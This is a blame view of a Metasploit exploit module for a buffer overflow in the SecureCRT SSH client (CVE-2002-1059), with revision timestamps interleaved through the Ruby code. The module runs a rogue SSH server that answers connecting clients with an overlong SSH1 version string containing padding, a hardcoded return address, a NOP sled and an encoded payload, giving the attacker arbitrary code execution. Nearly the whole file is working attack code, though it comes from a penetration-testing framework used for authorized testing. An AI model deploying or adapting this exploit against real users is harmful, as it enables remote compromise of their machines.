Files
metasploit-gs/modules/exploits/windows/ssh/securecrt_ssh1.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

76 lines
2.0 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2006-12-14 13:50:59 +00:00
include Msf::Exploit::Remote::TcpServer
2006-12-14 13:50:59 +00:00
def initialize(info = {})
2025-06-20 13:20:44 +01:00
super(
update_info(
info,
'Name' => 'SecureCRT SSH1 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in SecureCRT <= 4.0
2025-06-20 13:20:44 +01:00
Beta 2. By sending a vulnerable client an overly long
SSH1 protocol identifier string, it is possible to execute
arbitrary code.
2006-12-14 13:50:59 +00:00
2025-06-20 13:20:44 +01:00
This module has only been tested on SecureCRT 3.4.4.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' => [
2006-12-14 13:50:59 +00:00
[ 'CVE', '2002-1059' ],
[ 'OSVDB', '4991' ],
[ 'BID', '5287' ],
2006-12-14 13:50:59 +00:00
],
2025-06-20 13:20:44 +01:00
'DefaultOptions' => {
2006-12-14 13:50:59 +00:00
'EXITFUNC' => 'process',
},
2025-06-20 13:20:44 +01:00
'Payload' => {
'Space' => 400,
2006-12-14 13:50:59 +00:00
'BadChars' => "\x00",
2025-06-20 13:20:44 +01:00
'MaxNops' => 0,
2006-12-14 13:50:59 +00:00
'StackAdjustment' => -3500,
},
2025-06-20 13:20:44 +01:00
'Platform' => 'win',
'Targets' => [
2006-12-14 13:50:59 +00:00
[ 'SecureCRT.exe (3.4.4)', { 'Ret' => 0x0041b3e0 } ],
],
2025-06-20 13:20:44 +01:00
'Privileged' => false,
'DisclosureDate' => '2002-07-23',
'DefaultTarget' => 0,
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2006-12-14 13:50:59 +00:00
register_options(
[
2006-12-14 13:50:59 +00:00
OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ])
2025-06-20 13:20:44 +01:00
]
)
2006-12-14 13:50:59 +00:00
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
2006-12-14 13:50:59 +00:00
2025-06-20 13:20:44 +01:00
buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243)
2006-12-14 13:50:59 +00:00
buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded
print_status("Sending #{buffer.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(buffer)
handler
service.close_client(client)
end
end